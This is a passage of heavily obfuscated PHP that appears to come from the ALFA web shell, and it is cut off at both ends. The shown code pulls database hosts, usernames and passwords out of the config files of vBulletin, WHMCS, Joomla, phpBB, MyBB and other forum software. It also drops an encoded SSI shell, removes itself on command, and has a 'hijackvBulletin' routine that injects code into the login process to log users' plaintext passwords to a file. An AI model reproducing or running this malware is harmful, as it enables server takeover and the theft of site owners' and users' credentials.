array("\x2f\144\145\x66\x69\x6e\145\134\x28\47\104\102\x5f\x44\x41\x54\x41\102\x41\x53\105\x27\x2c\x28\134\x73\53\x29\50\77\72\x27\174\x22\x29\50\x2e\x2a\77\x29\50\x3f\x3a\47\x7c\x22\51\134\51\73\57", 2), "\144\x62\165\163\145\162" => array("\57\144\x65\146\x69\156\145\134\x28\47\104\102\137\x55\123\x45\122\116\x41\115\105\x27\54\x28\134\163\53\x29\x28\77\72\x27\x7c\42\x29\x28\56\x2a\77\x29\50\x3f\72\47\x7c\42\x29\x5c\x29\73\57", 2), "\x64\x62\x70\167" => array("\x2f\x64\x65\x66\151\156\x65\x5c\x28\47\104\x42\x5f\x50\101\x53\x53\127\117\122\x44\47\54\50\x5c\x73\x2b\51\x28\77\72\47\x7c\42\51\x28\56\x2a\77\51\x28\77\72\47\174\x22\51\x5c\51\73\57", 2), "\x70\162\145\146\151\170" => array("\x2f\x64\145\x66\x69\156\x65\134\x28\x27\104\x42\137\x50\x52\x45\x46\111\130\x27\54\50\134\x73\x2b\x29\50\77\72\x27\x7c\x22\51\x28\x2e\x2a\x3f\51\50\x3f\72\47\x7c\42\x29\134\51\73\x2f", 2)), "\x76\x62" => array("\x66\x69\x6c\x65" => "\57\x69\x6e\x63\x6c\165\144\145\x73\x2f\x63\157\156\x66\x69\147\56\160\x68\x70", "\x68\157\163\x74" => array("\x2f\143\x6f\x6e\x66\151\x67\x5c\x5b\x27\x4d\141\163\x74\145\x72\123\145\162\x76\145\x72\x27\134\x5d\x5c\133\x27\x73\x65\162\166\x65\x72\156\x61\x6d\x65\x27\x5c\135\50\x5c\163\53\51\x3d\50\134\163\53\x29\50\77\x3a\x27\174\x22\51\50\x2e\x2a\x3f\51\50\77\72\47\174\x22\x29\x3b\x2f", 3), "\144\x62\x75\163\x65\162" => array("\57\x63\157\x6e\146\x69\147\134\x5b\47\115\x61\x73\x74\x65\162\123\x65\x72\x76\145\x72\47\134\135\x5c\133\x27\165\x73\x65\162\156\141\155\x65\47\x5c\135\x28\134\x73\x2b\51\75\50\x5c\x73\53\x29\x28\x3f\72\x27\x7c\42\x29\50\x2e\x2a\x3f\x29\50\x3f\x3a\x27\x7c\x22\51\73\57", 3), "\144\142\x6e\x61\155\145" => array("\x2f\143\157\x6e\x66\151\x67\x5c\133\47\x44\141\x74\141\x62\141\x73\145\x27\x5c\135\x5c\x5b\x27\x64\142\x6e\141\x6d\x65\x27\x5c\135\50\x5c\163\53\x29\75\50\x5c\163\53\51\x28\77\72\47\x7c\42\51\x28\56\52\x3f\x29\50\x3f\72\47\174\x22\x29\73\x2f", 3), "\144\142\160\167" => array("\57\143\157\156\146\x69\x67\x5c\133\x27\x4d\141\163\x74\145\162\123\145\162\x76\x65\162\47\x5c\x5d\134\133\47\160\x61\x73\163\167\157\162\144\x27\x5c\135\x28\x5c\x73\53\x29\x3d\50\134\x73\53\x29\x28\x3f\72\47\174\42\x29\50\56\52\77\51\50\x3f\x3a\47\174\42\51\73\57", 3), "\x70\x72\x65\146\x69\170" => array("\57\143\x6f\x6e\x66\151\x67\x5c\x5b\47\104\141\x74\x61\x62\141\x73\145\47\134\135\x5c\133\x27\x74\141\x62\x6c\145\x70\x72\145\x66\151\170\47\x5c\x5d\x28\134\163\x2b\x29\75\50\x5c\163\53\x29\50\x3f\72\x27\x7c\x22\x29\x28\56\x2a\x3f\x29\50\x3f\72\x27\x7c\x22\51\73\x2f", 3)), "\x70\x68\x70\156\x75\153\145" => array("\146\151\154\145" => "\x2f\x63\157\156\146\x69\147\56\x70\150\x70", "\x68\157\163\164" => array("\x2f\144\142\x68\157\163\x74\x28\134\163\53\51\x3d\x28\x5c\x73\53\51\x28\x3f\x3a\47\x7c\42\51\x28\56\x2a\x3f\51\50\77\x3a\x27\174\x22\51\73\57", 3), "\x64\x62\x6e\x61\x6d\x65" => array("\57\x64\x62\156\141\x6d\145\50\x5c\163\x2b\x29\75\x28\x5c\163\53\51\x28\77\x3a\47\174\42\51\x28\56\x2a\77\x29\x28\x3f\72\47\174\42\x29\x3b\57", 3), "\x64\x62\165\x73\x65\x72" => array("\57\144\x62\165\156\x61\155\145\50\x5c\x73\x2b\51\x3d\50\134\163\x2b\x29\x28\x3f\x3a\x27\x7c\x22\51\50\56\52\x3f\51\x28\77\72\47\x7c\x22\51\73\57", 3), "\x64\142\160\167" => array("\57\144\x62\160\141\163\x73\50\x5c\x73\x2b\51\75\x28\x5c\163\x2b\x29\x28\x3f\x3a\x27\x7c\42\x29\x28\56\x2a\77\x29\x28\77\x3a\x27\174\42\x29\x3b\x2f", 3), "\160\x72\x65\x66\x69\x78" => array("\x2f\160\x72\x65\x66\151\x78\x28\134\163\53\51\x3d\50\x5c\163\53\51\x28\77\x3a\x27\174\42\x29\x28\x2e\52\x3f\x29\x28\77\x3a\x27\174\42\51\73\57", 3)), "\x73\155\x66" => array("\146\x69\154\x65" => "\x2f\x53\145\164\164\151\156\147\x73\x2e\x70\150\160", "\150\x6f\163\x74" => array("\x2f\144\x62\137\163\x65\x72\166\145\x72\x28\134\x73\53\x29\75\x28\x5c\163\53\51\x28\77\x3a\47\x7c\x22\51\x28\x2e\x2a\x3f\51\x28\77\72\47\174\x22\x29\x3b\x2f", 3), "\x64\142\156\141\155\x65" => array("\57\144\142\x5f\156\x61\x6d\x65\x28\x5c\163\x2b\51\x3d\x28\x5c\x73\x2b\51\50\77\72\47\174\42\x29\50\56\52\77\51\x28\x3f\x3a\x27\x7c\x22\51\73\x2f", 3), "\144\142\x75\163\x65\162" => array("\x2f\144\142\137\x75\163\x65\162\x28\x5c\163\x2b\x29\x3d\50\134\163\x2b\51\50\77\72\x27\x7c\x22\x29\50\x2e\52\77\51\x28\77\72\47\174\x22\51\x3b\x2f", 3), "\x64\142\160\x77" => array("\57\144\x62\x5f\160\x61\x73\x73\167\144\50\x5c\x73\x2b\x29\75\50\x5c\x73\x2b\51\x28\x3f\72\47\x7c\42\51\x28\56\52\x3f\51\x28\x3f\72\47\174\42\x29\73\x2f", 3), "\160\162\x65\146\x69\170" => array("\x2f\x64\142\x5f\x70\x72\145\146\151\x78\50\134\x73\53\x29\x3d\50\134\163\53\51\50\77\x3a\47\174\42\x29\50\56\x2a\x3f\x29\x28\x3f\x3a\47\x7c\x22\x29\73\57", 3)), "\x77\x68\155\143\x73" => array("\x66\x69\x6c\x65" => "\x2f\143\x6f\x6e\x66\151\147\x75\x72\x61\x74\x69\157\156\x2e\160\150\x70", "\150\157\x73\x74" => array("\x2f\x64\142\x5f\x68\x6f\163\164\50\x5c\163\53\x29\75\x28\134\x73\53\x29\x28\x3f\x3a\47\x7c\42\51\x28\56\x2a\77\51\x28\77\x3a\x27\174\42\51\73\x2f", 3), "\144\142\156\x61\155\145" => array("\57\x64\x62\137\156\141\155\145\50\134\x73\x2b\x29\x3d\x28\x5c\163\x2b\x29\50\77\x3a\47\x7c\42\x29\50\56\x2a\77\x29\50\x3f\72\x27\x7c\x22\51\x3b\x2f", 3), "\144\142\165\163\x65\162" => array("\57\x64\142\137\x75\x73\145\x72\156\x61\x6d\x65\x28\x5c\x73\53\x29\x3d\x28\x5c\163\53\x29\x28\x3f\x3a\x27\x7c\42\x29\x28\x2e\x2a\x3f\51\50\77\72\47\174\42\x29\73\57", 3), "\x64\x62\x70\x77" => array("\x2f\x64\x62\x5f\x70\x61\163\x73\x77\157\x72\x64\x28\134\163\x2b\51\75\50\134\163\x2b\51\x28\x3f\72\x27\x7c\x22\51\x28\x2e\52\77\51\x28\x3f\x3a\x27\174\x22\x29\73\x2f", 3), "\143\x63\137\145\156\x63\162\171\x70\164\151\x6f\x6e\137\x68\141\x73\x68" => array("\57\143\x63\137\145\156\x63\x72\171\160\x74\151\157\x6e\137\150\x61\163\150\x28\x5c\x73\53\51\75\50\134\x73\x2b\51\50\x3f\72\x27\174\x22\51\50\56\52\x3f\x29\50\x3f\72\47\x7c\x22\x29\73\x2f", 3)), "\x6a\x6f\x6f\x6d\154\x61" => array("\x66\x69\x6c\145" => "\57\143\157\156\x66\151\147\165\162\141\164\151\157\156\56\x70\150\x70", "\150\x6f\x73\x74" => array("\x2f\x5c\44\150\157\x73\164\50\134\163\x2b\51\x3d\x28\x5c\163\53\51\x28\77\x3a\x27\x7c\x22\51\x28\56\52\77\x29\x28\x3f\72\x27\x7c\x22\x29\x3b\57", 3), "\144\142\x6e\x61\155\x65" => array("\57\x5c\x24\144\142\x28\134\163\x2b\x29\x3d\x28\134\x73\x2b\51\x28\77\x3a\47\x7c\42\x29\50\56\52\x3f\x29\50\x3f\72\47\x7c\42\x29\73\57", 3), "\144\x62\165\163\x65\x72" => array("\57\x5c\44\x75\x73\145\162\x28\134\x73\53\51\75\50\134\163\x2b\x29\50\x3f\x3a\47\x7c\x22\51\50\56\x2a\77\51\x28\77\72\x27\174\42\x29\73\57", 3), "\x64\142\160\167" => array("\57\134\44\x70\141\x73\x73\x77\157\162\x64\50\134\163\x2b\x29\75\50\134\163\x2b\51\50\77\72\47\x7c\x22\x29\50\56\x2a\x3f\x29\x28\x3f\x3a\x27\174\x22\51\x3b\57", 3), "\x70\x72\x65\146\x69\x78" => array("\57\134\x24\x64\142\160\x72\x65\x66\x69\x78\50\134\x73\x2b\51\75\x28\x5c\x73\53\x29\50\77\x3a\x27\174\x22\51\x28\56\52\77\x29\x28\77\x3a\47\x7c\x22\x29\73\57", 3)), "\x70\150\160\142\142" => array("\x66\x69\154\145" => "\57\x63\x6f\156\146\151\x67\56\160\x68\160", "\x68\157\163\x74" => array("\x2f\x64\x62\x68\157\x73\x74\x28\134\x73\53\51\75\x28\134\x73\53\51\50\x3f\72\x27\174\x22\x29\50\56\52\77\51\x28\77\x3a\47\174\42\51\73\x2f", 3), "\144\x62\x6e\x61\155\145" => array("\57\x64\x62\156\141\155\145\x28\134\x73\x2b\51\x3d\x28\x5c\163\53\x29\x28\x3f\x3a\x27\174\42\x29\x28\56\52\x3f\51\x28\x3f\x3a\47\x7c\x22\x29\73\57", 3), "\144\142\x75\x73\x65\x72" => array("\x2f\144\142\165\x73\x65\162\x28\x5c\x73\x2b\x29\75\50\134\x73\53\51\x28\x3f\72\x27\x7c\42\51\x28\56\52\x3f\51\50\77\x3a\x27\x7c\42\x29\73\x2f", 3), "\144\142\x70\x77" => array("\57\x64\142\x70\x61\x73\163\x77\x64\50\x5c\163\53\x29\75\50\134\x73\53\51\x28\x3f\72\x27\174\42\51\x28\x2e\x2a\77\51\x28\77\x3a\x27\x7c\42\51\73\57", 3), "\x70\x72\x65\146\151\170" => array("\57\164\x61\142\x6c\x65\137\x70\162\145\146\x69\x78\x28\134\163\53\x29\x3d\x28\x5c\163\x2b\x29\50\77\x3a\47\174\42\51\50\56\x2a\77\x29\50\77\72\x27\174\x22\51\x3b\57", 3)), "\155\x79\142\x62" => array("\146\x69\x6c\145" => "\x2f\x69\x6e\x63\57\x63\157\x6e\x66\151\x67\x2e\x70\150\160", "\x68\157\x73\164" => array("\57\x63\157\x6e\146\151\147\x5c\133\x27\x64\141\164\x61\x62\x61\x73\x65\x27\x5c\135\x5c\133\47\150\x6f\163\x74\156\x61\155\x65\47\x5c\x5d\50\134\x73\53\51\x3d\50\134\x73\x2b\x29\x28\77\x3a\47\174\x22\x29\50\56\x2a\77\51\50\77\72\x27\174\x22\x29\73\x2f", 3), "\144\x62\x6e\x61\x6d\x65" => array("\57\x63\157\156\146\151\147\x5c\133\47\x64\x61\164\x61\x62\141\x73\x65\47\x5c\135\x5c\x5b\47\144\141\x74\141\x62\x61\163\x65\x27\x5c\135\x28\x5c\x73\x2b\x29\x3d\x28\134\163\53\51\50\x3f\72\x27\x7c\x22\x29\50\x2e\x2a\x3f\x29\50\x3f\72\47\x7c\x22\51\73\x2f", 3), "\x64\x62\165\163\145\x72" => array("\x2f\x63\157\x6e\146\x69\147\x5c\133\x27\144\x61\164\141\x62\141\x73\x65\47\134\135\x5c\133\47\165\x73\x65\162\156\x61\155\x65\x27\134\135\x28\x5c\x73\53\x29\75\x28\134\163\x2b\x29\x28\77\72\x27\174\42\51\x28\56\x2a\x3f\51\50\x3f\72\x27\x7c\x22\x29\73\x2f", 3), "\144\x62\160\x77" => array("\57\143\157\x6e\x66\151\x67\x5c\133\x27\x64\x61\164\x61\x62\x61\x73\145\47\x5c\135\134\133\47\160\x61\x73\163\x77\157\x72\144\x27\x5c\x5d\x28\x5c\x73\x2b\x29\75\x28\134\163\x2b\x29\50\x3f\72\x27\x7c\x22\51\50\56\52\77\x29\50\77\x3a\x27\x7c\42\51\73\57", 3), "\x70\162\x65\x66\x69\x78" => array("\57\x63\x6f\x6e\146\151\147\134\133\x27\144\x61\x74\141\142\x61\x73\x65\x27\x5c\x5d\x5c\x5b\47\164\141\x62\x6c\x65\137\x70\162\145\x66\x69\170\x27\134\135\50\x5c\163\53\x29\x3d\50\x5c\163\x2b\51\x28\x3f\x3a\47\174\42\x29\50\x2e\x2a\77\51\50\x3f\x3a\47\174\42\x29\73\57", 3))); goto GCHJC; VbTrK: if (preg_match($srch_user, $file, $mach)) { $data["\165\163\x65\162"] = $mach[$cuser]; } goto wN95u; gX1pl: $prefix = $config[$cms]["\x70\x72\145\146\x69\x78"][0]; goto eA5O7; i0fZb: $cuser = $config[$cms]["\144\142\165\163\145\162"][1]; goto Ty22b; Olzts: $file = __read_file($file); goto v68WE; GCHJC: $data = array(); goto KGKqW; lUUUC: $chost = $config[$cms]["\x68\157\163\x74"][1]; goto i0fZb; L52FJ: if (preg_match($srch_pw, $file, $mach)) { $data["\x70\x61\x73\163\167\x6f\162\144"] = $mach[$cpw]; } goto Q9dxZ; wN95u: if (preg_match($srch_name, $file, $mach)) { $data["\x64\142\156\141\155\145"] = $mach[$cname]; } goto L52FJ; H4L5m: $cms = $_POST["\141\154\146\141\61"]; goto wg3Ep; v68WE: if (preg_match($srch_host, $file, $mach)) { $data["\x68\x6f\163\x74"] = $mach[$chost]; } goto VbTrK; q6fPv: if (@is_dir($path) || _alfa_is_dir($path)) { $file = $path . $file; } elseif (@is_file($path) || _alfa_is_dir($path, "\x2d\x65")) { $file = $path; } else { return false; } goto Olzts; r89R9: } goto EURtO; dN901: if (!function_exists("\x70\157\x73\151\170\137\x67\x65\164\147\162\x67\x69\x64") && strpos(@ini_get("\x64\x69\163\141\x62\x6c\x65\x5f\x66\x75\156\143\x74\151\x6f\x6e\x73"), "\160\157\x73\x69\170\137\147\x65\164\147\x72\147\x69\x64") === false) { function posix_getgrgid($p) { return false; } } goto kxiel; EURtO: if (empty($_POST["\141"])) { if (isset($default_action) && function_exists("\141\x6c\x66\x61" . $default_action)) { $_POST["\x61"] = $default_action; } else { $_POST["\x61"] = "\x46\x69\x6c\x65\x73\x4d\141\156"; } } goto IQjN1; wKMv3: function alfaPerms($p) { goto lEElX; Euq6X: $i .= $p & 0x40 ? $p & 0x800 ? "\163" : "\x78" : ($p & 0x800 ? "\x53" : "\55"); goto c0MSA; UVV_P: $i .= $p & 0x10 ? "\x77" : "\x2d"; goto psdRl; NVASg: $i .= $p & 0x2 ? "\167" : "\55"; goto TjvZe; SoSfV: return $i; goto Wz6hh; qc1gT: $i .= $p & 0x4 ? "\x72" : "\55"; goto NVASg; lEElX: if (($p & 0xc000) == 0xc000) { $i = "\163"; } elseif (($p & 0xa000) == 0xa000) { $i = "\154"; } elseif (($p & 0x8000) == 0x8000) { $i = "\55"; } elseif (($p & 0x6000) == 0x6000) { $i = "\142"; } elseif (($p & 0x4000) == 0x4000) { $i = "\x64"; } elseif (($p & 0x2000) == 0x2000) { $i = "\x63"; } elseif (($p & 0x1000) == 0x1000) { $i = "\x70"; } else { $i = "\x75"; } goto QQQWe; c0MSA: $i .= $p & 0x20 ? "\x72" : "\55"; goto UVV_P; eCu1D: $i .= $p & 0x80 ? "\167" : "\55"; goto Euq6X; TjvZe: $i .= $p & 0x1 ? $p & 0x200 ? "\x74" : "\170" : ($p & 0x200 ? "\124" : "\x2d"); goto SoSfV; psdRl: $i .= $p & 0x8 ? $p & 0x400 ? "\x73" : "\x78" : ($p & 0x400 ? "\123" : "\x2d"); goto qc1gT; QQQWe: $i .= $p & 0x100 ? "\x72" : "\55"; goto eCu1D; Wz6hh: } goto a8cEH; ib3Lc: function alfaselfrm() { if (isset($_POST["\141\x6c\x66\x61\x31"]) && $_POST["\141\154\x66\x61\x31"] == "\x79\x65\x73") { goto X4f6N; LJdNv: echo "\74\57\143\x65\x6e\x74\145\x72\x3e"; goto rRKHa; X4f6N: echo __pre() . "\74\x63\145\156\164\145\x72\76"; goto saFm7; saFm7: if (@unlink($GLOBALS["\137\x5f\146\x69\154\x65\x5f\x70\x61\x74\150"])) { echo "\74\x62\76\x53\150\145\154\154\40\x68\x61\x73\x20\142\145\145\156\x20\x72\145\155\x6f\x76\145\144\x3c\57\151\76\x20\x3a\x29\x3c\57\x62\x3e"; } else { echo "\x75\156\154\151\x6e\153\x20\145\162\x72\157\x72\x21"; } goto LJdNv; rRKHa: } if (isset($_POST["\141\x6c\146\x61\x31"]) && $_POST["\x61\154\x66\x61\x31"] != "\171\145\163") { goto nKM1W; bJIAt: echo "\xd\xa\74\143\145\x6e\x74\x65\x72\x3e\x3c\160\x3e\x3c\x69\155\x67\40\163\x72\x63\75\42\x68\164\x74\x70\x3a\x2f\x2f\163\157\154\x65\x76\x69\163\x69\142\154\145\56\143\157\155\57\x69\x6d\x61\147\x65\x73\57\x66\141\x72\x76\x61\150\141\x72\55\151\162\141\x6e\x2e\160\x6e\x67\x22\x3e\x3c\x2f\x70\76"; goto gSf5T; gSf5T: echo "\74\160\x3e\74\x64\x69\166\x20\x63\154\141\x73\x73\x3d\42\x74\x78\164\146\157\156\x74\x22\76\104\x6f\x20\x79\x6f\165\40\167\141\156\164\x20\164\157\40\x64\x65\163\164\x72\x6f\171\x20\155\145\77\x21\x3c\57\144\151\x76\x3e\74\141\x20\150\162\x65\146\x3d\x6a\x61\166\141\x73\x63\x72\151\160\x74\x3a\x76\x6f\x69\144\x28\x30\x29\x20\157\x6e\143\154\151\x63\x6b\x3d\x22\147\x28\47\163\x65\x6c\146\162\155\x27\x2c\x6e\x75\154\x6c\x2c\47\171\x65\163\x27\51\73\42\76\40\131\x65\163\74\x2f\x61\76"; goto TKsul; TKsul: echo "\74\x2f\160\x3e\x3c\x2f\143\145\156\x74\x65\162\x3e\x3c\57\x64\151\166\76"; goto KRNjx; nKM1W: echo "\x3c\x64\x69\x76\x20\143\154\x61\x73\x73\75\x68\x65\x61\x64\145\x72\x3e"; goto bJIAt; KRNjx: } } goto BO7_9; lgB26: function alfassiShell() { goto p4eLi; tiv2e: @chmod("\141\154\146\x61\137\163\163\x69\56\163\x68\x74\x6d\154", 0755); goto RcEft; bbip0: alfafooter(); goto NREPb; RcEft: echo AlfaiFrameCreator("\141\154\146\141\137\x73\x68\x74\155\154\x2f\141\x6c\146\x61\x5f\x73\x73\x69\56\x73\x68\x74\155\x6c"); goto a5xsI; IjRoV: @mkdir("\x61\x6c\x66\x61\x5f\x73\150\x74\155\x6c", 0755); goto w7W3T; BVN26: $code = "\x72\126\x62\x39\x62\x39\x73\62\x45\x50\61\x58\x72\x6b\171\x32\62\x4d\150\163\113\x63\x75\66\160\164\142\x48\60\101\x2b\166\172\131\142\103\x58\x65\x7a\164\154\x36\x59\157\x5a\111\x6d\123\x32\126\x43\x6b\x51\x46\x4a\117\x76\103\x58\57\x2b\64\66\x53\162\x43\150\x4f\x6e\x4b\x52\102\x41\70\x4f\x52\x79\117\x50\x6a\165\63\145\120\122\57\x76\120\102\x6f\x4f\144\127\111\x71\125\x5a\x55\x43\126\171\x6e\125\x57\x6b\105\71\x6a\160\141\x54\x36\x54\x41\141\104\60\x4f\71\115\141\57\131\x76\124\130\x4d\124\153\x50\x6e\x4b\x55\x4e\x33\x4f\163\150\124\x6f\122\x61\x45\103\x30\x6a\163\154\165\x2b\71\x6e\163\x34\x39\146\x33\153\167\x6d\146\170\x36\120\124\167\x6b\105\x63\105\160\x4f\123\x52\70\165\x4c\70\x46\117\156\x6f\172\57\53\156\163\x38\156\130\63\65\x4d\x4a\x36\x39\156\67\172\106\53\127\143\x32\x34\x4e\x31\x34\x68\152\x45\105\61\156\151\141\107\x6c\x68\x47\151\x4b\143\130\156\117\x41\124\x4c\x32\154\101\x75\111\x59\102\x6a\x36\66\x44\x4b\x4e\146\60\63\x68\126\144\x4a\164\x65\x72\122\x49\112\x73\x38\x51\x32\53\103\57\117\x50\153\53\x6b\127\66\153\x7a\105\114\130\126\156\117\114\172\x6a\121\60\x33\163\106\112\x48\127\65\70\154\104\x53\x58\x57\167\x4e\x70\x4f\103\x7a\x61\167\127\x4a\x75\145\x68\166\66\x42\x52\x45\166\x71\107\x47\x55\67\104\x56\172\x79\x4e\131\x45\141\152\x48\x4b\x62\124\x59\x35\147\x75\x4b\117\x65\53\x55\60\x2f\65\117\x6c\x61\163\115\115\x41\152\x6b\x5a\126\122\x68\154\123\x2f\x52\x73\165\157\110\x69\x52\150\x57\x6f\162\131\115\103\x6b\x67\x6b\143\x7a\60\111\x4a\x63\x4a\x68\x54\x37\70\x78\x39\111\x65\152\x73\x52\154\x54\157\x55\132\170\x6c\x4b\145\x4d\127\x72\x46\111\115\122\x4f\111\154\53\x6f\x78\172\x51\x71\x75\102\x45\62\x31\x41\x57\x33\123\x4d\x54\104\x57\103\x2b\126\x71\x6d\x66\x7a\101\x34\141\x52\162\x6f\146\57\57\120\x58\x53\111\x61\x63\151\x4d\167\x73\120\x39\166\x63\132\71\x44\x63\63\103\x39\x5a\x68\156\x33\x44\x4e\x5a\x39\x68\110\x50\x43\167\151\125\61\x51\x48\163\x30\x58\65\x45\67\x67\110\70\105\x63\153\64\117\x44\154\x43\170\144\143\144\x31\122\71\64\x4e\x32\x48\x47\146\107\165\x62\x6b\117\61\111\170\153\x31\131\x30\x37\164\64\53\x76\x56\x63\x62\x4a\117\x64\x31\x6a\112\x37\x72\x56\x52\130\x4d\x61\x52\x31\127\123\157\x4b\x4a\x64\x52\60\165\x74\x37\126\x36\61\115\122\155\x59\132\x70\172\x31\x67\x69\126\x56\151\117\67\113\x64\x48\62\x71\x7a\x34\156\123\x59\115\x4a\x51\153\127\x69\x47\x50\x33\x6a\145\106\157\71\170\103\103\157\x72\x32\57\x41\x33\111\x48\x45\155\144\105\122\147\61\131\x39\66\x56\67\x39\121\x6c\104\110\x32\x6e\116\163\112\143\x4a\151\165\121\x77\x6a\x49\117\171\114\x61\x4e\x39\155\113\132\x35\65\x46\111\71\166\x72\104\106\x45\x4d\60\65\x6b\x5a\147\156\x73\127\x53\x53\57\x54\147\x6a\154\x76\71\105\131\147\64\x45\x32\146\x59\x41\126\101\127\116\x47\130\156\102\142\144\x52\x6f\x5a\x2b\x77\x5a\145\x6a\x48\x69\x45\x6e\170\x5a\130\x45\131\x2b\x71\153\x55\x42\x74\x59\x67\x7a\61\57\x47\x38\x65\105\x68\x43\123\x2f\x68\104\x6c\146\x43\160\x65\x2f\x59\141\105\163\142\x46\x7a\x70\162\106\101\166\142\120\157\144\x2b\62\127\x44\x61\x5a\150\123\x51\x2f\x51\117\103\x6d\x63\x57\x63\170\x63\151\x6a\x71\x63\x41\145\x46\x63\x73\71\171\x37\65\x53\114\123\102\x78\161\x62\x52\125\157\x30\111\x79\x43\x2b\112\126\132\x45\141\x4b\112\x68\x34\112\170\x32\114\112\x6c\114\x51\141\101\x42\117\160\142\101\156\147\x4a\163\x36\70\x77\x77\x48\x54\x77\153\x49\105\102\112\106\x62\x32\113\x59\x61\x49\x36\x74\66\101\67\162\172\x36\64\x74\x58\x72\71\57\x2b\x37\x6a\126\151\x46\111\x72\127\122\x37\154\121\x64\x6d\x75\x78\x74\105\x66\142\161\125\142\x74\164\x46\x4f\x4a\x56\130\57\146\60\165\x35\x78\155\127\113\x2f\145\62\x53\155\142\x2b\x72\x71\x41\x68\x34\x37\x30\x48\125\x54\62\112\x4a\162\x54\143\x68\x6d\x6a\x4c\130\x4f\x42\113\x4a\x57\x45\x77\x54\x4f\x57\x57\111\x57\101\x54\154\x77\63\122\x2f\x51\107\126\x49\154\x46\107\x75\x4b\x6c\x72\x44\103\126\x49\x32\63\131\124\107\120\x34\162\116\x4d\171\126\111\153\x67\x30\x61\x57\x32\x6a\172\x65\x7a\132\x35\67\57\x33\61\x51\x4e\143\x55\142\x45\x74\x39\x73\144\x59\63\105\x38\x77\x32\110\x31\121\x57\167\x68\x55\130\113\x30\106\x69\x36\x54\130\x55\x65\x6a\156\x34\125\143\x31\x31\64\63\127\x38\x45\125\x44\x6e\153\x31\103\167\x6b\112\x6f\x4b\156\167\165\x71\163\x79\x33\156\x4f\152\x44\x30\x74\62\x4c\x47\165\x6a\64\141\164\x4c\102\x4e\106\141\143\x43\x73\103\x6b\172\x56\x30\x41\163\x4d\162\167\164\x30\61\x45\x6a\122\102\112\x4f\x77\x67\145\x2f\x47\61\67\x44\x74\172\130\x42\123\x43\147\122\x30\x4c\x49\x46\x62\x50\x74\x38\157\x2f\127\x61\x43\x4a\x31\123\130\x33\x48\121\171\x75\63\154\147\114\114\x46\x49\x30\141\x68\x7a\x67\x75\153\166\61\x45\x32\x4f\x4b\x69\123\x4e\x56\x66\x77\132\x51\132\x55\x38\x74\64\x2f\120\x53\130\120\71\130\x4e\x41\x59\x34\152\x77\x4a\x64\162\x47\x63\x31\124\63\x6b\x72\x48\110\167\141\161\154\x38\101\x58\65\162\61\62\71\172\113\154\x35\x69\152\63\124\x71\x70\x4b\103\x71\141\162\111\141\125\x53\102\154\x6e\117\x6f\110\x7a\x32\x56\x31\122\x54\x37\x53\x72\164\x2f\112\160\146\x58\x64\x58\71\155\60\x52\x6e\171\66\127\x66\71\150\x39\114\x78\x4b\x46\110\162\131\152\x6b\167\132\x63\145\170\107\115\x53\x38\124\62\x68\71\61\x4b\x76\x79\x51\144\121\x75\x70\67\x2f\104\x75\x30\x67\114\146\66\71\167\x6a\164\x39\113\x77\x43\x6e\x79\x53\x61\67\146\x6c\116\125\130\x30\x42\x78\x4c\x59\164\x72\x54\x53\x4c\x37\130\x30\157\112\x45\x6b\x32\x45\x56\116\x72\112\152\61\x79\x75\157\156\141\116\x66\53\124\63\132\71\x49\x2f\127\x74\146\124\162\155\166\71\127\165\x48\130\165\x6c\62\x6f\x76\x4b\x2f\x74\172\66\x48\x77\75\75"; goto VA7fK; w7W3T: @chdir("\x61\x6c\146\141\x5f\x73\x68\x74\x6d\154"); goto NWNyN; a5xsI: echo "\x3c\x2f\144\151\166\76"; goto bbip0; p4eLi: alfahead(); goto rMuQT; rMuQT: echo "\x3c\x64\151\x76\40\143\x6c\x61\163\163\75\x68\145\x61\x64\x65\162\76"; goto IjRoV; NWNyN: alfacgihtaccess("\163\x68\x74\155\154"); goto BVN26; VA7fK: @__write_file("\141\x6c\146\141\137\163\x73\151\56\163\x68\x74\x6d\154", __get_resource($code)); goto tiv2e; NREPb: } goto UpqQn; s1zW6: function hijackvBulletin($path, $saveto) { goto BxHuc; CYJcx: $dologin = "\144\157\137\x6c\x6f\x67\151\x6e\x5f\162\x65\144\x69\x72\145\x63\164\50\51\73"; goto ek5Qn; rxL_S: $class = $path . "\57\x69\156\x63\154\x75\x64\x65\x73\57\143\x6c\x61\x73\x73\137\x62\x6f\157\164\163\164\162\141\160\56\x70\x68\160"; goto CYJcx; G6C3i: $clearpw = "\x64\x65\146\x69\156\145\144\50\x27\x44\x49\x53\x41\102\x4c\x45\137\120\x41\x53\x53\127\x4f\122\x44\x5f\103\x4c\x45\101\x52\x49\x4e\x47\47\51"; goto lUgJl; BxHuc: $code = "\x24\x61\154\146\141\x5f\x75\163\x65\x72\156\141\155\145\40\75\x20\163\164\x72\x74\157\154\x6f\x77\145\162\50\x24\x76\142\x75\154\x6c\x65\x74\151\156\x2d\x3e\107\120\x43\x5b\x22\166\142\x5f\x6c\157\147\151\x6e\x5f\165\x73\x65\162\156\x61\x6d\x65\x22\135\x29\73\x24\x61\154\146\141\137\160\x61\163\x73\x77\x6f\162\x64\x20\75\40\x24\166\x62\x75\154\x6c\x65\x74\151\156\x2d\76\107\120\103\133\42\166\x62\137\154\157\x67\151\x6e\x5f\x70\141\x73\163\167\x6f\x72\144\x22\x5d\x3b\44\x61\x6c\x66\x61\137\146\151\x6c\x65\x20\75\40\x22\x7b\163\141\166\145\x74\157\x5f\x70\141\x74\x68\175\x22\x3b\x24\x73\161\154\137\x71\165\145\162\171\x20\75\40\44\144\142\x2d\76\x71\165\x65\x72\171\x5f\x72\145\x61\x64\x28\42\x53\x45\x4c\105\103\124\40\x2a\x20\106\122\x4f\115\x20\42\40\x2e\40\124\101\x42\x4c\105\x5f\x50\122\x45\106\x49\x58\x20\56\40\x22\x75\x73\x65\162\x20\127\x48\105\122\x45\40\140\x75\x73\145\x72\x6e\141\155\145\140\75\x27\x22\x20\56\x20\44\x61\x6c\x66\141\137\x75\163\x65\162\x6e\141\155\145\40\x2e\40\x22\47\x22\x29\x3b\167\x68\x69\x6c\x65\50\x24\x72\157\x77\40\75\x20\44\144\x62\x2d\x3e\146\145\x74\x63\x68\x5f\141\x72\x72\x61\171\x28\x24\163\161\154\137\x71\165\x65\x72\x79\x29\x29\173\151\146\x28\163\164\162\154\145\x6e\50\x24\141\x6c\x66\x61\137\x70\x61\163\x73\167\157\162\144\51\x20\76\x20\61\x20\101\116\x44\40\x73\x74\162\154\x65\156\50\x24\x61\x6c\146\141\137\x75\x73\x65\162\x6e\x61\155\x65\x29\x20\x3e\x20\x31\51\x7b\x24\146\x70\x31\40\75\40\100\x66\x6f\x70\145\156\50\x24\x61\154\x66\x61\137\146\151\x6c\145\54\x20\x22\141\53\x22\x29